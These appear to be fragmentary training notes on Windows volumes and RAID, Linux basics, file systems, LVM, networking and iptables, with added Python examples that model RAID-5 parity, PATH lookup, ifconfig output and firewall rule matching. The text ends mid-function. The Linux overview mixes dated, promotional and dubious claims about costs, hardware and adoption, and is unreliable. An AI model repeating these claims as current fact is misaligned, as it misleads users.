3.10.3.2 Spanned Volumes: A spanned volume consists of disk space from more than one physical disk. You can add more space to a spanned volume by extending it at any time. A spanned volume is not fault tolerant: the loss of any one of its disks loses the whole volume.
3.10.3.3 Striped Volumes: A striped volume stores data in stripes on two or more physical disks. Data in a striped volume is allocated alternately and evenly (in stripes) to the disks contained within the striped volume. Striped volumes can substantially improve the speed of access to the data on disk. Striped volumes are often referred to as RAID-0; this configuration tends to enhance performance, but it is not fault tolerant.
3.10.3.4 Mirrored Volumes and RAID-5 Volumes: You can create mirrored volumes and RAID-5 volumes only on dynamic disks running on Windows Server 2008, Windows Server 2003, or Windows 2000 Server computers. Both mirrored volumes and RAID-5 volumes are considered fault tolerant because these configurations can handle a single disk failure and still function normally. Mirrored volumes and RAID-5 volumes both require that an equal amount of disk space be available on each disk that will be part of these volumes. A mirrored volume must use exactly two physical disks, no more and no fewer. A RAID-5 volume must use at least three physical hard disks, up to a maximum of 32 physical disks.

Many network administrators and consultants agree that hardware-based fault tolerant solutions are more robust and reliable than software-based fault tolerant configurations. By installing one or more RAID controller adapter cards into a server, you can set up several different types of hardware fault tolerance, such as mirroring, RAID-5, RAID 10 (mirrored volumes that are part of a striped array set), and RAID 0+1 (striped volumes that are part of a mirrored set). When you use hardware RAID, you can retain basic disks or convert disks to dynamic; hardware RAID is transparent to Windows Server 2008, which sees only the logical disks the controller presents. Of course, it is less expensive to implement a software solution, such as setting up mirrored volumes or RAID-5 volumes using the Disk Management console in Windows Server 2008, but often the improved performance, reliability, and flexibility of hardware-based RAID far outweigh its extra cost.
3.11 RAID
When configuring fault tolerance for a server, you will often consider fault tolerance on your disks first. Fault tolerance on disks comes in the form of a Redundant Array of Independent Disks (originally Redundant Array of Inexpensive Disks), or RAID.

RAID 0 (disk striping)
- Strengths: Highest performance
- Weaknesses: No data protection; if one drive fails, all data is lost

RAID 1 (disk mirroring)
- Strengths: Very high performance; very high data protection; very minimal penalty on write performance
- Weaknesses: High redundancy cost overhead; because all data is duplicated, twice the storage capacity is required

RAID 2 (not used in LAN environments)
- Strengths: No practical use
- Weaknesses: Previously used for RAM error correction (known as Hamming code) and in disk drives before the use of embedded error correction

RAID 3
- Strengths: Excellent performance for large, sequential data requests
- Weaknesses: Not well suited for transaction-oriented network applications; the single parity drive does not support multiple, simultaneous read and write requests

RAID 4
- Strengths: No practical use; the same performance can be achieved by RAID 3 at lower cost
- Weaknesses: Write requests suffer from the same single-parity-drive bottleneck as RAID 3; RAID 5 offers equal data protection and better performance at the same cost

RAID 5 (striping with distributed parity)
- Strengths: Very high data protection (tolerates a single drive failure, see 3.10.3.4) with the parity spread across all drives, so reads and writes can proceed concurrently; better performance than RAID 4 at the same cost
- Weaknesses: Write performance is lower than RAID 0 or RAID 1, because every write must also read and rewrite the parity chunk of its stripe

RAID 0+1 / RAID 10 (mirrored stripes)
- Strengths: Highest performance, highest data protection (can tolerate multiple drive failures)
- Weaknesses: High redundancy cost overhead; because all data is duplicated, twice the storage capacity is required; requires
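The following is an added example, not code from the original document: a byte-level model of a RAID-5 volume with rotating parity, built to show why the software RAID-5 volumes of Section 3.10.3.4 survive exactly one disk failure and why a second failure loses the data. The disk count, chunk size and sample payload are constructed for the demo; real implementations add on-disk metadata and do the same XOR arithmetic in the controller or the LDM driver.

```python
# Added example (not from the original document): a byte-level RAID-5 model
# with left-symmetric rotating parity. Disk count, chunk size and payload are
# constructed for the demo.
from functools import reduce


def xor_blocks(blocks):
    """XOR equal-length byte strings together; this is all that RAID-5 parity is."""
    return bytes(reduce(lambda acc, b: [x ^ y for x, y in zip(acc, b)], blocks, [0] * len(blocks[0])))


def parity_disk(stripe_index, n_disks):
    """Left-symmetric rotation: the parity chunk moves one disk to the left each stripe."""
    return (n_disks - 1 - stripe_index) % n_disks


def raid5_write(data, n_disks=3, chunk=4):
    """Stripe data across n_disks with one parity chunk per stripe; returns (disks, payload_len)."""
    if n_disks < 3:
        raise ValueError("RAID-5 needs at least three disks")
    per_stripe = chunk * (n_disks - 1)
    padded = data + b"\0" * (-len(data) % per_stripe)          # pad the last stripe
    disks = [bytearray() for _ in range(n_disks)]
    for s in range(len(padded) // per_stripe):
        stripe = padded[s * per_stripe:(s + 1) * per_stripe]
        data_chunks = [stripe[k * chunk:(k + 1) * chunk] for k in range(n_disks - 1)]
        p = parity_disk(s, n_disks)
        it = iter(data_chunks)
        for d in range(n_disks):
            disks[d] += xor_blocks(data_chunks) if d == p else next(it)
    return [bytes(d) for d in disks], len(data)


def raid5_read(disks, length, chunk=4):
    """Read the payload back; a failed disk is given as None and rebuilt from the survivors."""
    n = len(disks)
    failed = [i for i, d in enumerate(disks) if d is None]
    if len(failed) > 1:
        raise RuntimeError(f"{len(failed)} disks failed; RAID-5 tolerates only one")
    stripes = len(next(d for d in disks if d is not None)) // chunk
    out = bytearray()
    for s in range(stripes):
        p = parity_disk(s, n)
        blocks = [None if d is None else d[s * chunk:(s + 1) * chunk] for d in disks]
        if failed:                                   # missing chunk = XOR of all the other chunks
            m = failed[0]
            blocks[m] = xor_blocks([b for i, b in enumerate(blocks) if i != m])
        out += b"".join(b for i, b in enumerate(blocks) if i != p)   # drop parity, keep data
    return bytes(out[:length])


def survives_failure(data, fail, n_disks=4, chunk=4):
    """Write data, fail the listed disk indices, and report whether it reads back intact."""
    disks, length = raid5_write(data, n_disks, chunk)
    for i in fail:
        disks[i] = None
    try:
        return raid5_read(disks, length, chunk) == data
    except RuntimeError:
        return False


if __name__ == "__main__":
    payload = b"The quick brown fox jumps over the lazy dog"   # constructed sample data
    print("no failure:    ", survives_failure(payload, []))
    print("one disk lost: ", survives_failure(payload, [2]))
    print("two disks lost:", survives_failure(payload, [0, 3]))
```

The rebuild is the same XOR in either direction, which is why a degraded RAID-5 array keeps serving reads (every read of a chunk on the dead disk costs a read of all the other disks) and why the window between the first failure and the end of the rebuild is the moment a second failure destroys the volume; mirroring avoids the parity arithmetic at the price of the full second copy listed under RAID 1.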
4. INTRODUCTION TO LINUX
Linux is open-source/free software. With its advanced server configuration, Red Hat is putting Linux as an operating system at the core of enterprise computing. Today Linux is found in Web infrastructure, file servers, ERP, and point-of-sale systems, and increasingly in the systems running critical applications at large companies. Analysts predict that by the end of this decade Linux will be a common element in the enterprise computing landscape. "Over the last year, we've seen Linux go from being focused on small and medium business to being used very deep in the enterprise," says Paul Cormier, executive vice president of engineering at Red Hat, a leading Linux platform provider.
(... computer servers, etc.). Linux is also a powerful yet comparatively simple and easy-to-use operating system, and a very reliable one. In the "crashme" style of stress test, which feeds random instruction streams to the kernel, Linux has been reported to hold up where Windows 9x/NT and commercial UNIXes such as IRIX, Solaris, HP-UX, AIX and SCO fail. Windows 95 users very often see GPF errors and system freezes. Linux is robust because its kernel is written and reviewed by a very large community on the Internet, so bugs are found and fixed quickly; uptimes of a year or more without a reboot are common on well-maintained servers. No kernel is free of errors, however, and security fixes for Linux are released regularly, so keeping the kernel patched is part of administering it. Linux scales well: it runs on uniprocessor, multiprocessor, parallel and even supercomputer systems, and it fully supports SMP (Symmetric Multi-Processing) machines with more than one CPU. Windows 95 supports only a single CPU, and Linux scales better than NT on SMP. Linux is a full 32-bit and 64-bit operating system. It is very modular and has already been ported to 64-bit chips such as the DEC Alpha, Sun UltraSPARC, Intel IA-64, Motorola/IBM PowerPC, Transmeta Crusoe and the GNU/GPL Freedom 64-bit CPU, whereas Windows 95 still has large chunks of 16-bit code in its kernel and runs only on Intel x86 chips. Linux is a secure OS by design: every process runs as a user with limited permissions, whereas Windows 95 has no real user separation and break-ins are easy. Windows 95/2000, NT and MS-DOS are plagued by computer viruses; far fewer viruses target Linux, and the Unix permission model limits the damage a program run by an ordinary user can do, so viruses cause a lot of damage on Windows 95/2000/NT but little on Linux. Linux is very mature and follows one of the oldest operating system designs in the world: UNIX, whose design and interfaces Linux follows, was born at AT&T Bell Labs 27 years ago for telecom research, and Linux is the end result of those 27 years of research and development by US and European universities and corporations.
It took 27 years to create that vast body of UNIX knowledge, and all of it is now sitting on the Linux CD-ROM in our hand. For example, programs like 'grep' have kept the same functionality and command-line options for decades and are still used in Linux. Linus Torvalds started Linux in 1991, but he borrowed many concepts and interfaces from UNIX, which is why Linux is said to carry 27 years of heritage. Today Linux is the ocean into which the other UNIXes like Solaris, HP-UX and AIX are merging, and in the near future many of them will be replaced by Linux. Linux is less demanding on system resources: it runs on a 386 PC with as little as 2 MB of RAM in command-line console mode. Windows 95/NT cannot, because their graphics engine is tightly coupled with the kernel, which makes them resource hogs and also makes them less reliable and predictable. Linux can do everything that Windows 95/NT does, but Windows 95/NT cannot do everything Linux does: in Windows 95/NT there is no option to run in command-line console mode without any graphics. Unlike Windows 95, X Window can run with very minimal resources; it runs on 486 boxes with just 8 MB of RAM. Linux uses X Window, an advanced network windowing system, whereas Windows 95/NT is a standalone single-workstation windowing system. For example, using X Window, users can display program output on any workstation monitor attached anywhere on the network: the 'xhost' command controls which hosts may draw on a display, and the DISPLAY environment variable (export DISPLAY=`hostname`:0.0) tells a program where to draw. Be careful with xhost: 'xhost +' lets every host on the network open your display and read your keystrokes, so prefer per-user xauth cookies or tunnelling X over ssh. Many such X Window functionalities are missing from Windows NT/95. X Window is an industry standard developed at MIT and a very powerful network windowing system: with it you can run programs on a supercomputer and display them on your Linux desktop locally. Even though X Window is network-resource intensive, it is becoming increasingly popular because of the availability of low-cost, high-speed networking: 1 Gigabit and 100 Megabit Ethernet cards, DSL lines, cable modems, Frame Relay and ATM networks. Linux has a very low total cost of ownership because it supports diskless nodes; the cost of maintaining Linux is reported to be about five times lower than for MS Windows.
Linux supports remote system administration far better than Windows NT/95: we can log in remotely and perform many administration tasks, such as adding users or rebooting a Linux server, from a terminal hundreds of miles away. Linux runs many 16-bit Windows applications such as MS Office and MS Word using WABI ($40) or WINE (free), and MS-DOS applications using DOSEMU, FreeDOS and DR-DOS, but Windows 95/NT will run only a few UNIX and Linux applications. Linux supports the su (substitute user) command: using su it is possible to switch user without logging off; for example 'su - root' starts a login shell as user 'root'. In Windows NT/95 you must log off completely to switch user. Linux has remote commands like 'rlogin' and telnet, which Windows NT/95 lacks; note that rlogin and telnet send passwords in clear text, so on any network you do not fully trust use ssh instead. The Linux kernel is small enough to fit on a single floppy. It is less complex yet very sophisticated and powerful, and a small kernel is easier to keep reliable; Linux applications, which are much bigger, run on top of the kernel. Linux has many powerful desktops: KDE, GNOME, TriTeal CDE, Motif mwm, OPEN LOOK olwm, twm, fvwm95, xdm, xsm, AfterStep, Window Maker (a NeXTSTEP look-alike), qvwm, amiwm (Amiga), mlvwm (Mac) and others. The KDE desktop is much more user-friendly than Windows 95, and you have more freedom and choice of desktops in Linux than in Windows 9x/NT. Linux needs only about 200 MB of disk space for installation. Linux supports dual boot on PCs: you can have Windows 95/NT on one partition and Linux on another, and during system startup the user selects whether to load Linux or Windows 95. Nowadays PCs ship with 6 GB of disk space. Linux runs on many hardware platforms: Intel, Motorola, PowerPC, RISC, DEC Alpha, MIPS, ARM, Transmeta Crusoe, SPARC and the GNU Freedom 64-bit CPU. Linux has already been ported to 1024-CPU supercomputers (Fujitsu, Hitachi, Sun, Intel and others), and Intel built the world's fastest supercomputer of its day with 10,240 Pentium CPUs (more than ten thousand CPUs) on a system similar to Linux. Linux follows the POSIX standard closely, whereas Windows NT/9x does not. POSIX is an IEEE (Institute of Electrical and Electronics Engineers) standard as well as an ANSI and international ISO standard; the US government generally requires POSIX compliance of any operating system it buys, and most UNIXes like Solaris, HP-UX, AIX and SCO are fully POSIX compliant. We can get the complete source code for the Linux OS and all of its applications, whereas Windows 9x/NT is proprietary and we get only the binaries. Having the source code is vital for companies because they can audit it, quickly add advanced features and share them with every other company in the world. Linux is free of cost. The downside of Windows 9x/NT is that you pay $200 (US dollars) per seat for Windows 95 and $800 (US dollars) per seat for Windows NT, and Microsoft applications like MS Office, C++ compilers and others will cost a further $400,000 US dollars. It is better to spend the money on hardware and use Linux as the software. Linux is comparatively trouble free, whereas you will have more headaches with Windows 95/NT. Linux comes with more than 1900 software packages on CD-ROM, and many more are being developed worldwide; all of the packages fit on a single Linux CD-ROM. Linux was awarded Best Network Operating System for 1997/98/99/2000 by many computer magazines (InfoWorld in the US and European publications).
The movie Titanic was created using Linux on Digital Alpha: Linux was used to create the computer graphics and animations for all of the shots in the movie. Linux was also used for storing data from experiments on the Space Shuttle, so Linux has orbited the earth in space.
4.2 Advantages of Linux (Table 4.1):
- Resistant to viruses
- Economical
- Advanced OS
- Secure
- Resistant to crashes
- Fully supported
- Powerful networking
- Variety of servers

Who is using Linux (Table 4.2):
Private sector: Raymonds, ICICI, IDBI, Bombay Dyeing, Asian Paints, Bharat Petroleum, Reliance.
Government sector: Air-India, Central Excise, Govt. of MP, Govt. of Goa, Govt. of Kerala, Govt. of AP, etc., Railways.
5.1 KERNEL
The core of the Linux system is the kernel, the operating system program. The kernel controls the resources of the computer, allotting them to different users and tasks. It interacts directly with the hardware, which makes programs easy to write and portable across different hardware platforms. Since the kernel communicates directly with the hardware, parts of the kernel must be customized to the hardware features of each system. However, the kernel does not deal directly with a user. Instead, the login process starts up a separate, interactive program, called the shell, for each user.
5.2 SHELL
Linux has a simple user interface called the shell that has the power to provide the services that a user wants. It protects the user from having to know the intricate hardware details.
5.4.2 ISO 9660 CD-ROM: the standard file system for CD-ROM. It is also known as the High Sierra File System or HSFS on other UNIX systems.
5.4.3 Minix: the standard file system for the Minix operating system and the original default Linux file system. The current Linux standard is ext3.
5.4.4 NTFS: the Microsoft Windows NT/2000/XP file system, which carries per-file ownership and access control lists. Currently supported by Linux as a read-only file system.
5.4.5 OS/2 HPFS: the standard file system for IBM's OS/2 operating system.
5.4.6 /proc: the /proc file system is a Linux virtual file system. Virtual means that it does not occupy real disk space; files are created as needed. /proc is used to provide information on kernel configuration, running processes and device status.
5.4.7 /dev/pts: the /dev/pts file system is the Linux implementation of the Open Group's Unix98 pseudo-terminal (PTY) support.
5.4.8 ROM: the ROM file system (romfs) is a read-only file system, intended primarily for initial RAM disks such as an installation boot floppy.
5.4.9 Second Extended (ext2): the basis for ext3, the standard Linux file system. The ext3 file system is essentially ext2 with journaling.
5.4.10 Third Extended (ext3): the standard Linux file system.
5.4.11 NFS: the Network File System. This is the system most commonly used to share files between Linux and UNIX computers.
5.4.12 SMB: Server Message Block (SMB) is based on Microsoft and IBM network protocols. Linux can use SMB to share files and printers with Microsoft Windows operating systems.
5.4.13 NCP: NetWare Core Protocol (NCP) is the network file system used by Novell, running over the IPX/SPX protocol stack. Linux can act as an NCP client.
The FHS (Filesystem Hierarchy Standard) is a standard for organizing directories on Linux and Unix-based systems. Every FHS-compliant operating system starts with a top directory, root, symbolized by the forward slash. All other directories are subdirectories of root.

Table 5.1
Directory   Description
/           The root directory. Other directories are below root in the FHS hierarchy. Unless mounted separately, the contents of other directories are in the root directory partition.
/bin        Essential command-line commands. Do not mount this directory on a separate volume, or you may not be able to find these commands when you use a rescue disk.
/boot       Linux startup programs; normally includes the Linux kernel. Separate /boot partitions are common; the default size is currently 100 MB.
/dev        Device files (nodes) through which programs reach the device drivers. Do not mount this directory on a separate partition.
/etc        Basic configuration files.
/home       User home directories (except the root user).
/lib        Program libraries. Do not mount this directory on a separate partition.
/mnt        Mount point for removable media (floppy disks, CD drives).
/opt        Add-on applications, such as StarOffice or VMware.
/proc       Virtual file system with information on the running kernel and processes.
/root       Home directory for the root user. Do not mount this directory separately.
/sbin       System administration commands. Do not mount this directory separately.
/tmp        Default directory for temporary files.
/usr        User programs, libraries and documentation (mostly static, shareable data).
/var        Log files, print spools and other variable-sized data.
5.4.3 $PATH
The shell environment variable that contains the list of directories to be searched, in order, for UNIX commands.

Common file name extensions:
.1 to .9: Manual page entries. The actual extension can be any value between 1 and 9 and can have an alphabetic suffix (.3x, .7, and so on).
.ag: Applixware graphics file.
.as: Applixware spreadsheet file.
.aw: Applixware word processing file.
.bmp: Bitmap graphics file.
.c: C source file.
.C: C++ source file.
.cc: C++ source file.
.conf: Configuration file.
.cxx: C++ source file.
.db: Database file.
.dvi: Device-independent TeX output.
.gif: GIF graphics file.
.gz: File compressed using the GNU gzip utility.
.h: C header file.
.html: HTML document.
.jpg: JPEG graphics file.
.m: Objective C source file.
.o: Compiled object file.
.p: Pascal language source file.
.pbm: Portable bitmap graphics file.
.pdf: Adobe Acrobat file.
.ps: PostScript file.
.s: Assembler file.
.tar: tar archive.
.tgz: Gzipped tar archive.
.tif: TIFF graphics file.
.txt: Text document.
.Z: File compressed using the compress command.
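The following is an added example, not code from the original notes: it models how a shell walks $PATH from left to right and runs the first matching file, and it lists the entries that make that lookup depend on the current directory. The filesystem contents and PATH values are constructed for the demonstration; in particular the "ls" in /home/alice stands for a program planted by another user.

```python
# Added example (not from the original notes): how a shell resolves a
# command name against $PATH, and a check for the entries an attacker can
# abuse. The filesystem and the PATH values below are constructed.
import posixpath
from typing import Dict, List, Optional, Set

# Constructed stand-in for the filesystem: directory -> executables in it.
# /home/alice contains a program named "ls" planted by another user.
SAMPLE_FS: Dict[str, Set[str]] = {
    "/bin": {"ls", "cat", "sh"},
    "/usr/bin": {"vim", "ssh"},
    "/home/alice": {"ls"},
}


def split_path(path_value: str) -> List[str]:
    """Split a PATH value on ':'. An empty element (from a leading,
    trailing or doubled colon) means the current directory, as in sh."""
    return path_value.split(":")


def resolve_entry(entry: str, cwd: str) -> str:
    """Turn one PATH entry into an absolute directory: "" and "." become
    cwd, any other relative name is taken relative to cwd."""
    return posixpath.normpath(posixpath.join(cwd, entry or "."))


def lookup(command: str, path_value: str, fs: Dict[str, Set[str]],
           cwd: str = "/home/alice") -> Optional[str]:
    """Return the path of the first `command` found in PATH order, or None.
    First match wins, exactly as the shell does it."""
    for entry in split_path(path_value):
        directory = resolve_entry(entry, cwd)
        if command in fs.get(directory, set()):
            return posixpath.join(directory, command)
    return None


def unsafe_entries(path_value: str) -> List[str]:
    """Entries whose meaning depends on the current directory: empty
    elements, "." and any other relative path. A root shell with such a
    PATH runs whatever file of that name sits in a directory it cd's into."""
    return [e for e in split_path(path_value) if not e.startswith("/")]
```

With PATH set to ".:/bin:/usr/bin" and the current directory /home/alice, `lookup("ls", ...)` returns the planted /home/alice/ls rather than /bin/ls; with "/bin:/usr/bin" it returns /bin/ls. `unsafe_entries` is the check to run on root's PATH in /etc/profile and the sudo environment.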
As a very special treat, LVM can even make 'snapshots' of itself, which let you make backups of a non-moving target. We return to this exciting possibility, which has lots of other real-world applications, later on. In the next section we explain the basics of LVM and the multitude of abstractions it uses. Historically, a partition size is static. This requires a system installer to consider not the question "how much data will be stored on this partition" but rather "how much data will EVER be stored on this partition". When users run out of space on a partition, they either have to re-partition (which may involve an entire operating system reload) or use kludges such as symbolic links. The notion that a partition is a sequential series of blocks on a physical disc has since evolved. Most Unix-like systems now have the ability to break up physical discs into some number of units. Storage units from multiple drives can be pooled into a "logical volume", where they can be allocated to partitions. Additionally, units can be added to or removed from partitions as space requirements change. This is the basis of a Logical Volume Manager (LVM). For example, say that you have a 1 GB disc and you create the "/home" partition using 600 MB. Imagine that you run out of space and decide that you need 1 GB in "/home". Using the old notion of partitions, you would have to have another drive at least 1 GB in size; you could then add the disc, create a new /home, and copy the existing data over. With an LVM setup, however, you could simply add a 400 MB (or larger) disc and add its storage units to the "/home" partition. Other tools let us resize an existing file system, so we simply resize it to take advantage of the larger partition size and we are back in business.
The physical media: we should take the word 'physical' with a grain of salt, though we will initially assume it to be a simple hard disk, or a partition. Examples: /dev/hda, /dev/hda6, /dev/sda.
A Logical Volume is the end result of our work, and it is there that we store our information. This is equivalent to the historic idea of partitions.
Figure 6.1
Figure 6.2
6.3 Filesystem
This filesystem is whatever we want it to be: the standard ext2, ReiserFS, NWFS, XFS, JFS, NTFS, etc. To the Linux kernel, there is no difference between a regular partition and a Logical Volume.

A Physical Volume, containing Physical Extents:

+----- [Physical Volume] ------+
| PE | PE | PE | PE | PE | PE |
+------------------------------+

A Volume Group, containing 2 Physical Volumes (PVs) with 6 Physical Extents:

+------ [Volume Group] ------------------+
| +--[PV] ---------+ +--[PV] ---------+ |
| | PE | PE | PE  | | PE | PE | PE  | |
| +----------------+ +----------------+ |
+----------------------------------------+

We now further expand this (see the figure): it shows two filesystems spanning two disks. The /home filesystem contains 4 Physical Extents, the /var filesystem 2.
7. X WINDOW SYSTEM
- Provides the foundation for the graphical component of Linux.
- Created in 1986.
- Client/server architecture.
- XFree86: free, open source implementation of X.
- Flexibility of the core components.
- Use fonts on the local or a remote machine.
- Different graphical logins: gdm, kdm, xdm.
KDE: the K Desktop Environment. It uses the Qt widget set.
GNOME: a consistent, easy-to-use desktop environment. GNOME has a collection of tools and libraries to develop software. It uses the GTK+ widget set.
- Kwrite: default KDE text editor.
- redhat-config-xfree86: the X configuration tool developed by Red Hat (monitor selection, resolution selection, video card selection).
- Xchat: full-featured IRC client.
- Gftp: graphical FTP client.
- Gimp: the GNU Image Manipulation Program.
- Window manager: a special X client that performs window movement, resizing and focus.
8. LINUX NETWORKING
For networking, first your hardware must be properly configured. Your network card should have been set up during the Linux installation or afterwards. Under Linux most network card drivers are implemented as modules; after the module is inserted, inspect the file /proc/modules to see whether it is loaded. The module configuration file is /etc/modules.conf. After setting up the card and connecting the cables, configure the network by running the command:
netconfig
While setting up the network, do not tamper with the loopback interface, which has the IP address 127.0.0.1. It is always there; it is the IP address through which the computer talks to itself. IP addresses are allocated either statically or dynamically.
For Linux networking (communication through a network) the two basic requirements are media and rules. By media we mean the communication link (cables), hubs and switches; it may be wired or wireless. A hub is a dumb device that works at the physical layer and repeats every frame to every port, whereas a switch is an intelligent device that works at the data link layer. To obtain good performance we use switches: a switch learns which MAC address sits behind which port and forwards a unicast frame only to that port instead of flooding it to all ports, so it has much higher performance; switches maintain a MAC address table for this mapping. Because a hub repeats everything to everyone, any host on a hub can sniff all traffic on the segment; a switch limits this, but does not eliminate it. By rules we mean the set of protocols used for communication. The protocol depends on the OS on the end systems: if both end systems run MS Windows, a small network may use NetBEUI while a larger network uses TCP/IP. End systems running Linux use TCP/IP.
8.1.2 Traceroute: shows the network path between the local and a remote system. Useful for pinpointing network congestion. Example: traceroute www.redhat.com

8.1.3 Netstat: lists network statistics and parameters, including network connections, the routing table and interface statistics. Example: netstat -rn or netstat -a

8.1.5 Ifconfig: the ifconfig command is used to configure and display network devices. Here is some sample output of an ifconfig command:

# /sbin/ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:50:56:40:1E:6A
          inet addr:192.168.199.131  Bcast:192.168.199.255  Mask:255.255.255.0
          UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:11253 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1304 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:2092656 (1.9 Mb)  TX bytes:161329 (157.5 Kb)
          Interrupt:10 Base address:0x10a0

# /sbin/ifconfig eth0 207.174.142.142

The first parameter, eth0, tells us which interface is being configured. The next argument, 207.174.142.142, is the new IP address being assigned to this interface. To make sure the change worked, we issue the ifconfig command again to view the current settings:

# /sbin/ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:50:56:40:1E:6A
          inet addr:207.174.142.142  Bcast:192.168.199.255  Mask:255.255.255.0
          UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:11253 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1304 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:2092656 (1.9 Mb)  TX bytes:161329 (157.5 Kb)
          Interrupt:10 Base address:0x10a0

Note that only the address changed: the broadcast address still reads 192.168.199.255, which does not belong to the 207.174.142.0/24 network the new address implies. Setting the address alone leaves the old netmask and broadcast in place, so in practice give all three at once, for example ifconfig eth0 207.174.142.142 netmask 255.255.255.0 broadcast 207.174.142.255. Changes made with ifconfig are also lost at reboot unless they are written into the interface configuration files.
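As an added example (not code from the original notes), the following parses the text that the net-tools ifconfig prints and checks that address, netmask and broadcast agree with each other, which is the mistake visible in the second listing above. The sample text is constructed from that listing; the regular expressions assume the classic net-tools output format shown here, not the newer iproute2 format.

```python
# Added example (not from the original notes): parse the output of the
# net-tools ifconfig shown above and check that address, netmask and
# broadcast agree. The sample text is constructed from the second listing
# in the notes, where only the address was changed.
import ipaddress
import re
from typing import Dict, Optional, Tuple

SAMPLE_IFCONFIG = """\
eth0      Link encap:Ethernet  HWaddr 00:50:56:40:1E:6A
          inet addr:207.174.142.142  Bcast:192.168.199.255  Mask:255.255.255.0
          UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:11253 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1304 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:2092656 (1.9 Mb)  TX bytes:161329 (157.5 Kb)
          Interrupt:10 Base address:0x10a0
"""

_IP_FIELDS = re.compile(r"(inet addr|Bcast|Mask):(\S+)")
_HWADDR = re.compile(r"HWaddr\s+(\S+)")


def parse_ifconfig(text: str) -> Dict[str, Optional[str]]:
    """Extract interface name, hardware address, IP address, broadcast
    and netmask from one ifconfig block."""
    fields = dict(_IP_FIELDS.findall(text))
    hw = _HWADDR.search(text)
    return {
        "iface": text.split(None, 1)[0],
        "hwaddr": hw.group(1) if hw else None,
        "addr": fields.get("inet addr"),
        "bcast": fields.get("Bcast"),
        "mask": fields.get("Mask"),
    }


def check_consistency(cfg: Dict[str, Optional[str]]) -> Tuple[str, str, bool]:
    """Recompute the network (addr AND mask) and its broadcast, and compare
    the broadcast with what the interface reports.
    Returns (network_cidr, expected_broadcast, consistent)."""
    iface = ipaddress.ip_interface(f"{cfg['addr']}/{cfg['mask']}")
    expected = str(iface.network.broadcast_address)
    return str(iface.network), expected, expected == cfg["bcast"]


def fix_command(cfg: Dict[str, Optional[str]]) -> str:
    """The ifconfig invocation that sets all three values together, which
    is what should be typed instead of a bare address."""
    _network, bcast, _ok = check_consistency(cfg)
    return (f"ifconfig {cfg['iface']} {cfg['addr']} "
            f"netmask {cfg['mask']} broadcast {bcast}")
```

Run against the sample, `check_consistency` reports the network as 207.174.142.0/24 with expected broadcast 207.174.142.255 and flags the listing as inconsistent; `fix_command` produces the corrected ifconfig line.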
9. LINUX AS ROUTER
For a Linux machine to act as a router it must have at least two network cards, or IP aliases set up on one card, and IP forwarding must be enabled in the kernel (the /proc/sys/net/ipv4/ip_forward flag).

Figure 9.1: a Linux router with eth0 at 10.0.0.1 connecting a class A network (hosts 10.0.0.2 and 10.0.0.3 on Switch 1) to a class C network.
Dual-homed host (proxy):
- Filters protocols
- No routing between networks
- Not all protocols supported
- Can filter content
- High hardware requirements
- Works at the application layer
FORWARD, PREROUTING and POSTROUTING). The chains represent hooks in the netfilter code where packet filtering takes place. Rules in a chain are checked in order, and the first rule that matches decides the packet's fate; if no rule matches, the chain's default policy applies, so the order in which rules are added matters.

iptables -t filter -A INPUT -s 192.168.0.254 -j DROP
This drops any packet arriving from IP address 192.168.0.254.

iptables -t filter -A OUTPUT ! -d 192.168.0.254 -j DROP
This drops all outgoing packets to every host except 192.168.0.254.

iptables -t filter -A INPUT -s 192.168.0.251 -i eth3 -j DROP
This rule drops all packets from 192.168.0.251 coming in on the eth3 interface.

iptables -t filter -L INPUT
This is not a rule; it lists the rules currently in the given chain (add -n to avoid DNS lookups and -v to see packet counters).
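The following is an added example, not code from the original notes: a small model of how a netfilter chain evaluates rules like the ones above. It is a simulation of first-match semantics and the default policy, not a call into iptables, so it runs without root; the packets and rule set are constructed from the notes' three commands, and the `to_iptables` rendering uses the modern "! -d" negation syntax.

```python
# Added example (not from the original notes): a model of how a netfilter
# chain evaluates the rules above. A simulation, not a call into iptables,
# so it needs no root. Packets and rules are constructed from the notes.
import ipaddress
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

Packet = Dict[str, str]   # keys: "src", "dst", "in" (incoming interface)


@dataclass
class Rule:
    target: str                      # -j ACCEPT or -j DROP
    src: Optional[str] = None        # -s address or CIDR
    dst: Optional[str] = None        # -d address or CIDR
    in_iface: Optional[str] = None   # -i interface
    negate_src: bool = False         # ! -s
    negate_dst: bool = False         # ! -d

    def matches(self, pkt: Packet) -> bool:
        """Every specified match must hold (a negated one must fail)."""
        if self.src is not None:
            hit = ipaddress.ip_address(pkt["src"]) in ipaddress.ip_network(self.src, strict=False)
            if hit == self.negate_src:
                return False
        if self.dst is not None:
            hit = ipaddress.ip_address(pkt["dst"]) in ipaddress.ip_network(self.dst, strict=False)
            if hit == self.negate_dst:
                return False
        if self.in_iface is not None and pkt.get("in") != self.in_iface:
            return False
        return True

    def to_iptables(self, chain: str, table: str = "filter") -> str:
        """Render the equivalent command line (modern '! -s' negation)."""
        parts = ["iptables", "-t", table, "-A", chain]
        if self.src is not None:
            parts += (["!"] if self.negate_src else []) + ["-s", self.src]
        if self.dst is not None:
            parts += (["!"] if self.negate_dst else []) + ["-d", self.dst]
        if self.in_iface is not None:
            parts += ["-i", self.in_iface]
        parts += ["-j", self.target]
        return " ".join(parts)


@dataclass
class Chain:
    name: str
    policy: str = "ACCEPT"           # applied when no rule matches
    rules: List[Rule] = field(default_factory=list)

    def append(self, rule: Rule) -> None:          # like -A
        self.rules.append(rule)

    def insert(self, rule: Rule, pos: int = 0) -> None:   # like -I
        self.rules.insert(pos, rule)

    def verdict(self, pkt: Packet) -> Tuple[str, Optional[int]]:
        """Walk the chain top to bottom; the first matching rule decides.
        Returns (target, index of the deciding rule, or None for policy)."""
        for i, rule in enumerate(self.rules):
            if rule.matches(pkt):
                return rule.target, i
        return self.policy, None


def build_notes_chains() -> Dict[str, Chain]:
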